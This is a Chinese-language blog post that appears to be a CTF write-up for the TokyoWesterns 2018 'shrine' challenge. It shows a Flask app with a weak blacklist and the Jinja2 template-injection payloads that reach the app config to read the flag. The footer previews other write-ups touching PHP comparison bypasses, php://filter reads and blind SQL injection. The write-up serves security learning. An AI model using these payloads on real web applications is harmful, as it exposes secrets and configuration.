TokyoWesternsCTF2018

发表于2020-03-18|更新于2024-03-19|CTF

|总字数:275|阅读时长:1分钟|浏览量:

shrine

进页面就有这段代码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

1. If I can use `config`

1	GET /shrine/{{config}}

2. If I can use `self`

{{self}} ⇒

1	{{self.__dict__}}

. Also, there are many things that can be used.

url_for, g, request, namespace, lipsum, range, session, dict, get_flashed_messages, cycler, joiner, config

3. If I can use `(` and `)`

1	{{[].__class__.__base__.__subclasses__()[68].__init__.__globals__['os'].__dict__.environ['FLAG]}}

【method 1.Discover current_app in url_for 】

1	{{url_for}}

↓

1	<function url_for at 0x7f5cc8cd1f28>

1	{{url_for.__globals__}}

【method 2.Discover current_app in get_flashed_messages 】

1	{{get_flashed_messages}}

↓

``

1	{{get_flashed_messages.__globals__}}

【exploit】

1	GET /shrine/{{url_for.__globals__['current_app'].config['FLAG']}}

or

1	GET /shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

↓

1	TWCTF{pray_f0r_sacred_jinja2}

https://ctftime.org/writeup/10895

https://www.colabug.com/2018/0908/4435040/

文章作者: LYC

文章链接: http://991688344.github.io/2020/03/18/TokyoWesternsCTF2018/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Rick！

相关推荐

这个tornado是一个python的模板，在web使用的时候给出了四个文件，可以访问，从提示中和url中可以看出，访问需要文件名+文件签名（长度为32位，计算方式为md5(cookie_secret + md5(filename))）; flag文件名题目已给出 /fllllllllllag ...

piapiapia 数组绕过正则反序列化长度问题导致的尾部字符逃逸顺手存一下图片~ 输入admin@admin（@表示分割姓名密码）提示Invalid user name or password 输入admin@1提示Invalid password 输入admin@asd提示Invalid user name or password 输入admin@123提示Invalid user name or password 输入sadaaaaaa@asdddd提示Invalid user name 输入username=aaaaaaaaaabbbbbbb&password=21提示Invalid user name 输入username=aaaaaaaaaabbbbb&password=22提示Invalid password 输入username=aaaaaaaaaabbbbbb&password=211提示Invalid user name or password 貌似和长度有关系，但是没看到有啥用扫一下目录发现 12Dir found:...

Day 1 0x01 Web3 伪协议 md5碰撞 file_get_contents($shell1)==='first blood' 利用php://input 来绕过 $shell2==md5($shell2) 利用PHP松散比较特性来绕过, **0e开头的字符串md5值也是0e开头即可绕过,**写脚本找到一个合适的数字: 0e215962017 12php > var_dump('0e215962017'=='0e291242476940776845150308577824');bool(true) $shell3 = preg_replace('/php/','',$shell3); 只过滤了一次php,并且没有对大小写限制构造伪协议读取PHP://filter/read=convert.base64-encode/resource=flag.pphphp 脚本: 12345678910111213141516171819202122import string,hashlibimport...

Online Tool RCE 123456789101112131415161718<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) { highlight_file(__FILE__);} else { $host = $_GET['host']; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in...

CISCN2019华北赛区

Hack World 搜索框输入1或2会返回结果，其他都返回bool(false)。过滤了union、and、or、空格等，包括/**/，后来看源码知道是过滤了*。有意思的是输入1/1时会正常返回结果，可以判断这是数字型的sql注入。根据1和2返回结果的不同，可能是bool盲注，()没有过滤，可以使用大部分函数,空格的绕过有这些方法我测试是可以的 %09 %0a %0b %0c %0d /**/ /*!*/或者直接tab %20 好像没法绕，%00截断好像也影响sql语句的执行或者用括号也可以。任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。本题中可以if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2) 写个脚本跑一下(本地测试的 buu复现的环境网络不行所以必须加延时,时间太久了) 1234567891011121314151617181920212223242526272829303132333435363738394041import...

评论

数据加载中